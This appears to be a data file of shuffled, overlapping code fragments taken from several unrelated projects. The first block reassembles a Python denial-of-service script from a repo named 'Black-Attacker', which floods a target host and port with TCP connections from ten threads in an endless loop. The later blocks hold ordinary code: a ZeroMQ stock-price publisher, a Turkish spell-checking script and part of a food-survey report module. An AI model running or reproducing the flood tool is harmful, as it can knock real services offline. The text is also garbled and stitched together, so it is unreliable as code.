"use ctrl + c and ctrl + v (~ ̄▽ ̄)~ import os,sys,socket,threading try: from",
"def dos(d): while True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\") for",
"ImportError: os.system(\"pip install colorama\") end = '\\033[0m' def main(): print() if sys.argv[1] ==",
"s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\") for i in range(10): t",
"port = int(sys.argv[2]) def dos(d): while True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send",
"= sys.argv[1] port = int(sys.argv[2]) def dos(d): while True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port))",
"<reponame>black-software-Com/Black-Attacker<gh_stars>1-10 #!/usr/bin/python3 # Please read the code. Do not use ctrl + c",
"socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\") for i in range(10): t = threading.Thread(target=dos,args=[i])",
"init() except ImportError: os.system(\"pip install colorama\") end = '\\033[0m' def main(): print() if",
"not use ctrl + c and ctrl + v (~ ̄▽ ̄)~ import os,sys,socket,threading try:",
"(~ ̄▽ ̄)~ import os,sys,socket,threading try: from colorama import Fore,init init() except ImportError: os.system(\"pip install",
"from colorama import Fore,init init() except ImportError: os.system(\"pip install colorama\") end = '\\033[0m'",
"= '\\033[0m' def main(): print() if sys.argv[1] == sys.argv[1]: host = sys.argv[1] port",
"main(): print() if sys.argv[1] == sys.argv[1]: host = sys.argv[1] port = int(sys.argv[2]) def",
"os.system(\"pip install colorama\") end = '\\033[0m' def main(): print() if sys.argv[1] == sys.argv[1]:",
"s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\") for i in range(10): t = threading.Thread(target=dos,args=[i]) t.start()",
"ctrl + v (~ ̄▽ ̄)~ import os,sys,socket,threading try: from colorama import Fore,init init() except",
"v (~ ̄▽ ̄)~ import os,sys,socket,threading try: from colorama import Fore,init init() except ImportError: os.system(\"pip",
"# Please read the code. Do not use ctrl + c and ctrl",
"read the code. Do not use ctrl + c and ctrl + v",
"import Fore,init init() except ImportError: os.system(\"pip install colorama\") end = '\\033[0m' def main():",
"= socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet Send To {Fore.GREEN}{host}{end}\") for i in range(10): t =",
"Fore,init init() except ImportError: os.system(\"pip install colorama\") end = '\\033[0m' def main(): print()",
"Do not use ctrl + c and ctrl + v (~ ̄▽ ̄)~ import os,sys,socket,threading",
"i in range(10): t = threading.Thread(target=dos,args=[i]) t.start() if __name__ == '__main__': try: main()",
"print() if sys.argv[1] == sys.argv[1]: host = sys.argv[1] port = int(sys.argv[2]) def dos(d):",
"colorama import Fore,init init() except ImportError: os.system(\"pip install colorama\") end = '\\033[0m' def",
"+ c and ctrl + v (~ ̄▽ ̄)~ import os,sys,socket,threading try: from colorama import",
"ctrl + c and ctrl + v (~ ̄▽ ̄)~ import os,sys,socket,threading try: from colorama",
"== sys.argv[1]: host = sys.argv[1] port = int(sys.argv[2]) def dos(d): while True: s",
"def main(): print() if sys.argv[1] == sys.argv[1]: host = sys.argv[1] port = int(sys.argv[2])",
"+ v (~ ̄▽ ̄)~ import os,sys,socket,threading try: from colorama import Fore,init init() except ImportError:",
"code. Do not use ctrl + c and ctrl + v (~ ̄▽ ̄)~ import",
"sys.argv[1] port = int(sys.argv[2]) def dos(d): while True: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((host,port)) print(f\"{Fore.RED}Packet",
"To {Fore.GREEN}{host}{end}\") for i in range(10): t = threading.Thread(target=dos,args=[i]) t.start() if __name__ ==",
"in range(10): t = threading.Thread(target=dos,args=[i]) t.start() if __name__ == '__main__': try: main() except",
"if sys.argv[1] == sys.argv[1]: host = sys.argv[1] port = int(sys.argv[2]) def dos(d): while",
"os,sys,socket,threading try: from colorama import Fore,init init() except ImportError: os.system(\"pip install colorama\") end"
] |
[
"while True: negative = -1 if random.random()>=0.5 else 1 # Decides whether the",
"def start_new_server(front_port: int, stock: str, stock_value: float): s = Server(front_port, stock, stock_value) s.run()",
"server') finally: self._socket.close() self._context.term() def start_new_server(front_port: int, stock: str, stock_value: float): s =",
"messagedata)) # Sends the message through the socket time.sleep(1) except: print('Shutting down server')",
"a stock associated with him and constantly generates a new variation of the",
"= stock_value port = str(front_port) self._context = zmq.Context() self._socket = self._context.socket(zmq.PUB) # Defines",
"(self._stock, messagedata)) # Sends the message through the socket time.sleep(1) except: print('Shutting down",
"variation = random.random() * 0.01 * negative # Decides the variation value self._value",
"__init__(self, front_port: int, stock: str, stock_value: float): self._stock = stock self._value = stock_value",
"the frontend port of the forwarder def run(self): try: while True: negative =",
"sockets as a pub type socket self._socket.connect(\"tcp://localhost:%s\" % port) # Bind the socket",
"the new value messagedata = \"Stock:%s\" % self._stock + \"_Value:%f\" %self._value + \"_Variation:%f\"",
"it has a stock associated with him and constantly generates a new variation",
"str, stock_value: float): self._stock = stock self._value = stock_value port = str(front_port) self._context",
"stock self._value = stock_value port = str(front_port) self._context = zmq.Context() self._socket = self._context.socket(zmq.PUB)",
"consequently,to the subs \"\"\" def __init__(self, front_port: int, stock: str, stock_value: float): self._stock",
"int, stock: str, stock_value: float): self._stock = stock self._value = stock_value port =",
"self._context.socket(zmq.PUB) # Defines its sockets as a pub type socket self._socket.connect(\"tcp://localhost:%s\" % port)",
"def run(self): try: while True: negative = -1 if random.random()>=0.5 else 1 #",
"stock_value port = str(front_port) self._context = zmq.Context() self._socket = self._context.socket(zmq.PUB) # Defines its",
"new variation of the stock price and publishes it to the forwarder, and",
"# Decides whether the variation will be positive or negative variation = random.random()",
"Bind the socket to the frontend port of the forwarder def run(self): try:",
"down server') finally: self._socket.close() self._context.term() def start_new_server(front_port: int, stock: str, stock_value: float): s",
"as a pub type socket self._socket.connect(\"tcp://localhost:%s\" % port) # Bind the socket to",
"# Sends the message through the socket time.sleep(1) except: print('Shutting down server') finally:",
"is the publisher, it has a stock associated with him and constantly generates",
"subs \"\"\" def __init__(self, front_port: int, stock: str, stock_value: float): self._stock = stock",
"* 0.01 * negative # Decides the variation value self._value += self._value *",
"the forwarder, and consequently,to the subs \"\"\" def __init__(self, front_port: int, stock: str,",
"value messagedata = \"Stock:%s\" % self._stock + \"_Value:%f\" %self._value + \"_Variation:%f\" %(variation*100) +\"%\"",
"except: print('Shutting down server') finally: self._socket.close() self._context.term() def start_new_server(front_port: int, stock: str, stock_value:",
"stock price and publishes it to the forwarder, and consequently,to the subs \"\"\"",
"Mount up the message about the stock self._socket.send_string(\"%s %s\" % (self._stock, messagedata)) #",
"Server(): \"\"\" The server is the publisher, it has a stock associated with",
"negative # Decides the variation value self._value += self._value * variation # Sets",
"a new variation of the stock price and publishes it to the forwarder,",
"* variation # Sets up the new value messagedata = \"Stock:%s\" % self._stock",
"zmq.Context() self._socket = self._context.socket(zmq.PUB) # Defines its sockets as a pub type socket",
"self._stock = stock self._value = stock_value port = str(front_port) self._context = zmq.Context() self._socket",
"else 1 # Decides whether the variation will be positive or negative variation",
"message through the socket time.sleep(1) except: print('Shutting down server') finally: self._socket.close() self._context.term() def",
"+ \"_Value:%f\" %self._value + \"_Variation:%f\" %(variation*100) +\"%\" # Mount up the message about",
"value self._value += self._value * variation # Sets up the new value messagedata",
"the publisher, it has a stock associated with him and constantly generates a",
"= \"Stock:%s\" % self._stock + \"_Value:%f\" %self._value + \"_Variation:%f\" %(variation*100) +\"%\" # Mount",
"will be positive or negative variation = random.random() * 0.01 * negative #",
"= str(front_port) self._context = zmq.Context() self._socket = self._context.socket(zmq.PUB) # Defines its sockets as",
"True: negative = -1 if random.random()>=0.5 else 1 # Decides whether the variation",
"Decides the variation value self._value += self._value * variation # Sets up the",
"%self._value + \"_Variation:%f\" %(variation*100) +\"%\" # Mount up the message about the stock",
"positive or negative variation = random.random() * 0.01 * negative # Decides the",
"%(variation*100) +\"%\" # Mount up the message about the stock self._socket.send_string(\"%s %s\" %",
"-1 if random.random()>=0.5 else 1 # Decides whether the variation will be positive",
"0.01 * negative # Decides the variation value self._value += self._value * variation",
"\"\"\" The server is the publisher, it has a stock associated with him",
"# Sets up the new value messagedata = \"Stock:%s\" % self._stock + \"_Value:%f\"",
"+ \"_Variation:%f\" %(variation*100) +\"%\" # Mount up the message about the stock self._socket.send_string(\"%s",
"its sockets as a pub type socket self._socket.connect(\"tcp://localhost:%s\" % port) # Bind the",
"float): self._stock = stock self._value = stock_value port = str(front_port) self._context = zmq.Context()",
"# Bind the socket to the frontend port of the forwarder def run(self):",
"constantly generates a new variation of the stock price and publishes it to",
"\"\"\" def __init__(self, front_port: int, stock: str, stock_value: float): self._stock = stock self._value",
"variation # Sets up the new value messagedata = \"Stock:%s\" % self._stock +",
"stock self._socket.send_string(\"%s %s\" % (self._stock, messagedata)) # Sends the message through the socket",
"it to the forwarder, and consequently,to the subs \"\"\" def __init__(self, front_port: int,",
"the subs \"\"\" def __init__(self, front_port: int, stock: str, stock_value: float): self._stock =",
"self._socket = self._context.socket(zmq.PUB) # Defines its sockets as a pub type socket self._socket.connect(\"tcp://localhost:%s\"",
"Decides whether the variation will be positive or negative variation = random.random() *",
"print('Shutting down server') finally: self._socket.close() self._context.term() def start_new_server(front_port: int, stock: str, stock_value: float):",
"def __init__(self, front_port: int, stock: str, stock_value: float): self._stock = stock self._value =",
"a pub type socket self._socket.connect(\"tcp://localhost:%s\" % port) # Bind the socket to the",
"% (self._stock, messagedata)) # Sends the message through the socket time.sleep(1) except: print('Shutting",
"socket self._socket.connect(\"tcp://localhost:%s\" % port) # Bind the socket to the frontend port of",
"generates a new variation of the stock price and publishes it to the",
"# Defines its sockets as a pub type socket self._socket.connect(\"tcp://localhost:%s\" % port) #",
"frontend port of the forwarder def run(self): try: while True: negative = -1",
"= stock self._value = stock_value port = str(front_port) self._context = zmq.Context() self._socket =",
"random.random() * 0.01 * negative # Decides the variation value self._value += self._value",
"negative = -1 if random.random()>=0.5 else 1 # Decides whether the variation will",
"message about the stock self._socket.send_string(\"%s %s\" % (self._stock, messagedata)) # Sends the message",
"the forwarder def run(self): try: while True: negative = -1 if random.random()>=0.5 else",
"price and publishes it to the forwarder, and consequently,to the subs \"\"\" def",
"the message about the stock self._socket.send_string(\"%s %s\" % (self._stock, messagedata)) # Sends the",
"% self._stock + \"_Value:%f\" %self._value + \"_Variation:%f\" %(variation*100) +\"%\" # Mount up the",
"= zmq.Context() self._socket = self._context.socket(zmq.PUB) # Defines its sockets as a pub type",
"finally: self._socket.close() self._context.term() def start_new_server(front_port: int, stock: str, stock_value: float): s = Server(front_port,",
"forwarder, and consequently,to the subs \"\"\" def __init__(self, front_port: int, stock: str, stock_value:",
"\"_Variation:%f\" %(variation*100) +\"%\" # Mount up the message about the stock self._socket.send_string(\"%s %s\"",
"about the stock self._socket.send_string(\"%s %s\" % (self._stock, messagedata)) # Sends the message through",
"and constantly generates a new variation of the stock price and publishes it",
"import zmq import random import time class Server(): \"\"\" The server is the",
"whether the variation will be positive or negative variation = random.random() * 0.01",
"publishes it to the forwarder, and consequently,to the subs \"\"\" def __init__(self, front_port:",
"up the message about the stock self._socket.send_string(\"%s %s\" % (self._stock, messagedata)) # Sends",
"zmq import random import time class Server(): \"\"\" The server is the publisher,",
"* negative # Decides the variation value self._value += self._value * variation #",
"him and constantly generates a new variation of the stock price and publishes",
"up the new value messagedata = \"Stock:%s\" % self._stock + \"_Value:%f\" %self._value +",
"str(front_port) self._context = zmq.Context() self._socket = self._context.socket(zmq.PUB) # Defines its sockets as a",
"stock: str, stock_value: float): self._stock = stock self._value = stock_value port = str(front_port)",
"self._stock + \"_Value:%f\" %self._value + \"_Variation:%f\" %(variation*100) +\"%\" # Mount up the message",
"\"Stock:%s\" % self._stock + \"_Value:%f\" %self._value + \"_Variation:%f\" %(variation*100) +\"%\" # Mount up",
"self._value += self._value * variation # Sets up the new value messagedata =",
"import time class Server(): \"\"\" The server is the publisher, it has a",
"random import time class Server(): \"\"\" The server is the publisher, it has",
"port) # Bind the socket to the frontend port of the forwarder def",
"<filename>devices/server.py import zmq import random import time class Server(): \"\"\" The server is",
"forwarder def run(self): try: while True: negative = -1 if random.random()>=0.5 else 1",
"has a stock associated with him and constantly generates a new variation of",
"%s\" % (self._stock, messagedata)) # Sends the message through the socket time.sleep(1) except:",
"type socket self._socket.connect(\"tcp://localhost:%s\" % port) # Bind the socket to the frontend port",
"of the forwarder def run(self): try: while True: negative = -1 if random.random()>=0.5",
"and publishes it to the forwarder, and consequently,to the subs \"\"\" def __init__(self,",
"+\"%\" # Mount up the message about the stock self._socket.send_string(\"%s %s\" % (self._stock,",
"Defines its sockets as a pub type socket self._socket.connect(\"tcp://localhost:%s\" % port) # Bind",
"the socket time.sleep(1) except: print('Shutting down server') finally: self._socket.close() self._context.term() def start_new_server(front_port: int,",
"self._context = zmq.Context() self._socket = self._context.socket(zmq.PUB) # Defines its sockets as a pub",
"Sets up the new value messagedata = \"Stock:%s\" % self._stock + \"_Value:%f\" %self._value",
"# Mount up the message about the stock self._socket.send_string(\"%s %s\" % (self._stock, messagedata))",
"= random.random() * 0.01 * negative # Decides the variation value self._value +=",
"random.random()>=0.5 else 1 # Decides whether the variation will be positive or negative",
"class Server(): \"\"\" The server is the publisher, it has a stock associated",
"associated with him and constantly generates a new variation of the stock price",
"variation will be positive or negative variation = random.random() * 0.01 * negative",
"stock associated with him and constantly generates a new variation of the stock",
"or negative variation = random.random() * 0.01 * negative # Decides the variation",
"with him and constantly generates a new variation of the stock price and",
"to the forwarder, and consequently,to the subs \"\"\" def __init__(self, front_port: int, stock:",
"The server is the publisher, it has a stock associated with him and",
"self._value = stock_value port = str(front_port) self._context = zmq.Context() self._socket = self._context.socket(zmq.PUB) #",
"messagedata = \"Stock:%s\" % self._stock + \"_Value:%f\" %self._value + \"_Variation:%f\" %(variation*100) +\"%\" #",
"% port) # Bind the socket to the frontend port of the forwarder",
"be positive or negative variation = random.random() * 0.01 * negative # Decides",
"= -1 if random.random()>=0.5 else 1 # Decides whether the variation will be",
"negative variation = random.random() * 0.01 * negative # Decides the variation value",
"pub type socket self._socket.connect(\"tcp://localhost:%s\" % port) # Bind the socket to the frontend",
"self._socket.send_string(\"%s %s\" % (self._stock, messagedata)) # Sends the message through the socket time.sleep(1)",
"variation value self._value += self._value * variation # Sets up the new value",
"through the socket time.sleep(1) except: print('Shutting down server') finally: self._socket.close() self._context.term() def start_new_server(front_port:",
"the stock self._socket.send_string(\"%s %s\" % (self._stock, messagedata)) # Sends the message through the",
"socket to the frontend port of the forwarder def run(self): try: while True:",
"the variation will be positive or negative variation = random.random() * 0.01 *",
"self._socket.connect(\"tcp://localhost:%s\" % port) # Bind the socket to the frontend port of the",
"+= self._value * variation # Sets up the new value messagedata = \"Stock:%s\"",
"import random import time class Server(): \"\"\" The server is the publisher, it",
"new value messagedata = \"Stock:%s\" % self._stock + \"_Value:%f\" %self._value + \"_Variation:%f\" %(variation*100)",
"publisher, it has a stock associated with him and constantly generates a new",
"= self._context.socket(zmq.PUB) # Defines its sockets as a pub type socket self._socket.connect(\"tcp://localhost:%s\" %",
"1 # Decides whether the variation will be positive or negative variation =",
"self._value * variation # Sets up the new value messagedata = \"Stock:%s\" %",
"front_port: int, stock: str, stock_value: float): self._stock = stock self._value = stock_value port",
"port of the forwarder def run(self): try: while True: negative = -1 if",
"the message through the socket time.sleep(1) except: print('Shutting down server') finally: self._socket.close() self._context.term()",
"and consequently,to the subs \"\"\" def __init__(self, front_port: int, stock: str, stock_value: float):",
"time.sleep(1) except: print('Shutting down server') finally: self._socket.close() self._context.term() def start_new_server(front_port: int, stock: str,",
"stock_value: float): self._stock = stock self._value = stock_value port = str(front_port) self._context =",
"server is the publisher, it has a stock associated with him and constantly",
"try: while True: negative = -1 if random.random()>=0.5 else 1 # Decides whether",
"socket time.sleep(1) except: print('Shutting down server') finally: self._socket.close() self._context.term() def start_new_server(front_port: int, stock:",
"time class Server(): \"\"\" The server is the publisher, it has a stock",
"Sends the message through the socket time.sleep(1) except: print('Shutting down server') finally: self._socket.close()",
"the socket to the frontend port of the forwarder def run(self): try: while",
"of the stock price and publishes it to the forwarder, and consequently,to the",
"the stock price and publishes it to the forwarder, and consequently,to the subs",
"# Decides the variation value self._value += self._value * variation # Sets up",
"self._context.term() def start_new_server(front_port: int, stock: str, stock_value: float): s = Server(front_port, stock, stock_value)",
"if random.random()>=0.5 else 1 # Decides whether the variation will be positive or",
"the variation value self._value += self._value * variation # Sets up the new",
"variation of the stock price and publishes it to the forwarder, and consequently,to",
"port = str(front_port) self._context = zmq.Context() self._socket = self._context.socket(zmq.PUB) # Defines its sockets",
"to the frontend port of the forwarder def run(self): try: while True: negative",
"run(self): try: while True: negative = -1 if random.random()>=0.5 else 1 # Decides",
"\"_Value:%f\" %self._value + \"_Variation:%f\" %(variation*100) +\"%\" # Mount up the message about the",
"self._socket.close() self._context.term() def start_new_server(front_port: int, stock: str, stock_value: float): s = Server(front_port, stock,"
] |
[
"TurkishMorphology, ) import sys import json import pandas as pd from tqdm import",
"sugg } with open(sys.argv[2], 'w') as f: for w in spellings: f.write(json.dumps(spellings[w], ensure_ascii=False)",
"= TurkishMorphology.create_with_defaults() sc = TurkishSpellChecker(morphology) if __name__ == '__main__': df = pd.read_csv(sys.argv[1]) spellings",
"int(w not in sugg), 'suggestions': sugg } with open(sys.argv[2], 'w') as f: for",
"import ( TurkishSpellChecker, TurkishMorphology, ) import sys import json import pandas as pd",
"<reponame>mukayese-nlp/mukayese-baselines from zemberek import ( TurkishSpellChecker, TurkishMorphology, ) import sys import json import",
"__name__ == '__main__': df = pd.read_csv(sys.argv[1]) spellings = {} for w, g in",
"import pandas as pd from tqdm import tqdm morphology = TurkishMorphology.create_with_defaults() sc =",
"as pd from tqdm import tqdm morphology = TurkishMorphology.create_with_defaults() sc = TurkishSpellChecker(morphology) if",
"pd from tqdm import tqdm morphology = TurkishMorphology.create_with_defaults() sc = TurkishSpellChecker(morphology) if __name__",
"w, 'gold': str(g), 'spelling': int(w not in sugg), 'suggestions': sugg } with open(sys.argv[2],",
"tqdm morphology = TurkishMorphology.create_with_defaults() sc = TurkishSpellChecker(morphology) if __name__ == '__main__': df =",
"sys import json import pandas as pd from tqdm import tqdm morphology =",
"zemberek import ( TurkishSpellChecker, TurkishMorphology, ) import sys import json import pandas as",
"g in tqdm(zip(df['input'], df['gold'])): sugg = sc.suggest_for_word(w) spellings[w] = { 'input': w, 'gold':",
"in tqdm(zip(df['input'], df['gold'])): sugg = sc.suggest_for_word(w) spellings[w] = { 'input': w, 'gold': str(g),",
"str(g), 'spelling': int(w not in sugg), 'suggestions': sugg } with open(sys.argv[2], 'w') as",
"== '__main__': df = pd.read_csv(sys.argv[1]) spellings = {} for w, g in tqdm(zip(df['input'],",
"= TurkishSpellChecker(morphology) if __name__ == '__main__': df = pd.read_csv(sys.argv[1]) spellings = {} for",
"if __name__ == '__main__': df = pd.read_csv(sys.argv[1]) spellings = {} for w, g",
"df = pd.read_csv(sys.argv[1]) spellings = {} for w, g in tqdm(zip(df['input'], df['gold'])): sugg",
"tqdm(zip(df['input'], df['gold'])): sugg = sc.suggest_for_word(w) spellings[w] = { 'input': w, 'gold': str(g), 'spelling':",
"sc.suggest_for_word(w) spellings[w] = { 'input': w, 'gold': str(g), 'spelling': int(w not in sugg),",
"{} for w, g in tqdm(zip(df['input'], df['gold'])): sugg = sc.suggest_for_word(w) spellings[w] = {",
") import sys import json import pandas as pd from tqdm import tqdm",
"{ 'input': w, 'gold': str(g), 'spelling': int(w not in sugg), 'suggestions': sugg }",
"import sys import json import pandas as pd from tqdm import tqdm morphology",
"'suggestions': sugg } with open(sys.argv[2], 'w') as f: for w in spellings: f.write(json.dumps(spellings[w],",
"} with open(sys.argv[2], 'w') as f: for w in spellings: f.write(json.dumps(spellings[w], ensure_ascii=False) +",
"with open(sys.argv[2], 'w') as f: for w in spellings: f.write(json.dumps(spellings[w], ensure_ascii=False) + '\\n')",
"import json import pandas as pd from tqdm import tqdm morphology = TurkishMorphology.create_with_defaults()",
"= pd.read_csv(sys.argv[1]) spellings = {} for w, g in tqdm(zip(df['input'], df['gold'])): sugg =",
"tqdm import tqdm morphology = TurkishMorphology.create_with_defaults() sc = TurkishSpellChecker(morphology) if __name__ == '__main__':",
"df['gold'])): sugg = sc.suggest_for_word(w) spellings[w] = { 'input': w, 'gold': str(g), 'spelling': int(w",
"= {} for w, g in tqdm(zip(df['input'], df['gold'])): sugg = sc.suggest_for_word(w) spellings[w] =",
"from tqdm import tqdm morphology = TurkishMorphology.create_with_defaults() sc = TurkishSpellChecker(morphology) if __name__ ==",
"sugg = sc.suggest_for_word(w) spellings[w] = { 'input': w, 'gold': str(g), 'spelling': int(w not",
"( TurkishSpellChecker, TurkishMorphology, ) import sys import json import pandas as pd from",
"sc = TurkishSpellChecker(morphology) if __name__ == '__main__': df = pd.read_csv(sys.argv[1]) spellings = {}",
"import tqdm morphology = TurkishMorphology.create_with_defaults() sc = TurkishSpellChecker(morphology) if __name__ == '__main__': df",
"pandas as pd from tqdm import tqdm morphology = TurkishMorphology.create_with_defaults() sc = TurkishSpellChecker(morphology)",
"TurkishMorphology.create_with_defaults() sc = TurkishSpellChecker(morphology) if __name__ == '__main__': df = pd.read_csv(sys.argv[1]) spellings =",
"'spelling': int(w not in sugg), 'suggestions': sugg } with open(sys.argv[2], 'w') as f:",
"'gold': str(g), 'spelling': int(w not in sugg), 'suggestions': sugg } with open(sys.argv[2], 'w')",
"pd.read_csv(sys.argv[1]) spellings = {} for w, g in tqdm(zip(df['input'], df['gold'])): sugg = sc.suggest_for_word(w)",
"w, g in tqdm(zip(df['input'], df['gold'])): sugg = sc.suggest_for_word(w) spellings[w] = { 'input': w,",
"spellings = {} for w, g in tqdm(zip(df['input'], df['gold'])): sugg = sc.suggest_for_word(w) spellings[w]",
"spellings[w] = { 'input': w, 'gold': str(g), 'spelling': int(w not in sugg), 'suggestions':",
"from zemberek import ( TurkishSpellChecker, TurkishMorphology, ) import sys import json import pandas",
"morphology = TurkishMorphology.create_with_defaults() sc = TurkishSpellChecker(morphology) if __name__ == '__main__': df = pd.read_csv(sys.argv[1])",
"not in sugg), 'suggestions': sugg } with open(sys.argv[2], 'w') as f: for w",
"= sc.suggest_for_word(w) spellings[w] = { 'input': w, 'gold': str(g), 'spelling': int(w not in",
"TurkishSpellChecker, TurkishMorphology, ) import sys import json import pandas as pd from tqdm",
"TurkishSpellChecker(morphology) if __name__ == '__main__': df = pd.read_csv(sys.argv[1]) spellings = {} for w,",
"= { 'input': w, 'gold': str(g), 'spelling': int(w not in sugg), 'suggestions': sugg",
"in sugg), 'suggestions': sugg } with open(sys.argv[2], 'w') as f: for w in",
"'__main__': df = pd.read_csv(sys.argv[1]) spellings = {} for w, g in tqdm(zip(df['input'], df['gold'])):",
"sugg), 'suggestions': sugg } with open(sys.argv[2], 'w') as f: for w in spellings:",
"json import pandas as pd from tqdm import tqdm morphology = TurkishMorphology.create_with_defaults() sc",
"'input': w, 'gold': str(g), 'spelling': int(w not in sugg), 'suggestions': sugg } with",
"for w, g in tqdm(zip(df['input'], df['gold'])): sugg = sc.suggest_for_word(w) spellings[w] = { 'input':"
] |
[
"ingredients) else: yield from self._recipe_rows(master_recipe, ingredients) for recipe in references: recipe = _insert_nsr_cols(recipe,",
"_INDICATORS_BY_SLUG[name] if indicator.is_calculated_later: if not self.enrichment_complete: raise AttributeError(f\"{name} hasn't yet been set. It",
"= [] for row in self._get_all_rows(): if self._matches_in_memory_filters(row): rows.append(row) return rows def _non_recipe_rows(self,",
"ingredient_data) for ingredient_data in self.fixtures.recipes[recipe.food_code]] else: # NON_STANDARD_RECIPE ingredients = [FoodRow(raw, self.fixtures) for",
"self.is_calculated_later = CALCULATED_LATER in tags # Indicator descriptions can be found here: #",
"None if self.fct_food_code_exists: self.fct_code = self.food_code self.fct_data_used = 'food_code' elif self.fct_base_term_food_code_exists: self.fct_code =",
"master_recipe) yield from self._recipe_rows(recipe, ingredients) @property @memoized def rows(self): rows = [] for",
"== FctGaps.AVAILABLE: return False food_types = self._in_memory_filter_selections.get('food_type') if food_types and row.food_type not in",
"= True yield row def _recipe_rows(self, raw_recipe, raw_ingredients): recipe = FoodRow(raw_recipe, self.fixtures) if",
"or from the parent food case's UCR if indicator.in_food_fixture: return getattr(self.fixtures.foods[self.food_code], indicator.slug) if",
"FctGaps.AVAILABLE for i in ingredients): self.fct_gap_code = FctGaps.AVAILABLE else: self.fct_gap_code = FctGaps.INGREDIENT_GAPS self.fct_gap_desc",
"FctGaps.REFERENCE, }[self.fct_data_used] if self.is_recipe and ingredients: if all(i.fct_gap_code == FctGaps.AVAILABLE for i in",
"hasn't been explicitly set, return that val return self.ucr_row[indicator.slug] if indicator.in_ucr else None",
"I('other_tag_9', IN_UCR), I('tag_10', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR), I('conv_method_code', IN_UCR), I('conv_method_desc', IN_UCR), I('conv_option_code', IN_UCR),",
"_maybe_float(self.portions) self.nsr_consumed_cooked_fraction = _maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete = False def _set_ingredient_fields(self, ingredient): if self._is_std_recipe_ingredient: self.is_ingredient",
"self.food_code in fct) self.fct_base_term_food_code_exists = bool(self.base_term_food_code and self.base_term_food_code in fct) self.fct_code = None",
"I('conv_method_desc', IN_UCR), I('conv_option_code', IN_UCR), I('conv_option_desc', IN_UCR), I('measurement_amount', IN_UCR), I('conv_units', IN_UCR), I('portions', IN_UCR), I('nsr_conv_method_code_post_cooking',",
"the DB, NOT ingredient cases ingredients = [FoodRow(raw_recipe, self.fixtures, ingredient_data) for ingredient_data in",
"I('portions', IN_UCR), I('nsr_conv_method_code_post_cooking', IN_UCR), I('nsr_conv_method_desc_post_cooking', IN_UCR), I('nsr_conv_option_code_post_cooking', IN_UCR), I('nsr_conv_option_desc_post_cooking', IN_UCR), I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction',",
"mention results in the creation of a \"food\" case that's a child of",
"CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'), I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'),",
"them from the master recipe nsr_cols = {col: master_recipe[col] for col in NSR_COLS_TO_COPY}",
"self.enrichment_complete = False def _set_ingredient_fields(self, ingredient): if self._is_std_recipe_ingredient: self.is_ingredient = 'yes' self.ingr_recipe_code =",
"k, v in filter_selections.items() if k in FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod def from_request(cls, domain,",
"IN_FOOD_FIXTURE), I('recipe_name', IN_UCR, CALCULATED_LATER), I('caseid'), I('food_type', IN_UCR, IN_FOOD_FIXTURE), I('food_status', IN_UCR, IS_RECALL_META), I('reference_food_code'), I('base_term_food_code',",
"for slug in filter_selections: if slug not in self.FILTERABLE_COLUMNS: raise AssertionError(f\"{slug} is not",
"IN_UCR), I('tag_4', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR), I('tag_5', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR), I('tag_6', IN_UCR,",
"'food_type'] FILTERABLE_COLUMNS = IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS def __init__(self, domain, *, datespan, filter_selections): for",
"reports Overview -------- Beneficiaries are asked about their diet in a \"recall\" session.",
"== FctGaps.slug and row.fct_gap_code == FctGaps.AVAILABLE: return False food_types = self._in_memory_filter_selections.get('food_type') if food_types",
"return None def _maybe_float(val): return float(val) if val not in (None, '') else",
"cls.FILTERABLE_COLUMNS if k != 'owner_id'}} ) @staticmethod def _get_owner_ids(domain, request): slugs = request.GET.getlist(EMWF.slug)",
"ingredients=None): if ingredients: for row in ingredients: row.set_fct_gap() self.fct_gap_code = FctGaps.NOT_AVAILABLE if self.food_type",
"ingredients = group['ingredients'] if not master_recipe: yield from self._non_recipe_rows(references + ingredients) else: yield",
"self.nsr_consumed_cooked_fraction = _maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete = False def _set_ingredient_fields(self, ingredient): if self._is_std_recipe_ingredient: self.is_ingredient =",
"ingredient. These rows are associated with the recipe case, but don't have a",
"IS_RECALL_META), I('reference_food_code'), I('base_term_food_code', IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time', IN_UCR, IS_RECALL_META), I('time_block', IN_UCR,",
"with the recipe case, but don't have a case of their own. Nonstandard",
"will be \" \"calculated outside the scope of FoodRow.\") return None if self._is_std_recipe_ingredient:",
"from corehq.apps.reports.filters.case_list import CaseListFilter as EMWF from corehq.apps.reports.standard.cases.utils import get_case_owners from custom.inddex.ucr_data import",
"import users as user_es from corehq.apps.reports.filters.case_list import CaseListFilter as EMWF from corehq.apps.reports.standard.cases.utils import",
"datespan, filter_selections): for slug in filter_selections: if slug not in self.FILTERABLE_COLUMNS: raise AssertionError(f\"{slug}",
"self._matches_in_memory_filters(row): rows.append(row) return rows def _non_recipe_rows(self, rows): \"\"\"These rows aren't part of a",
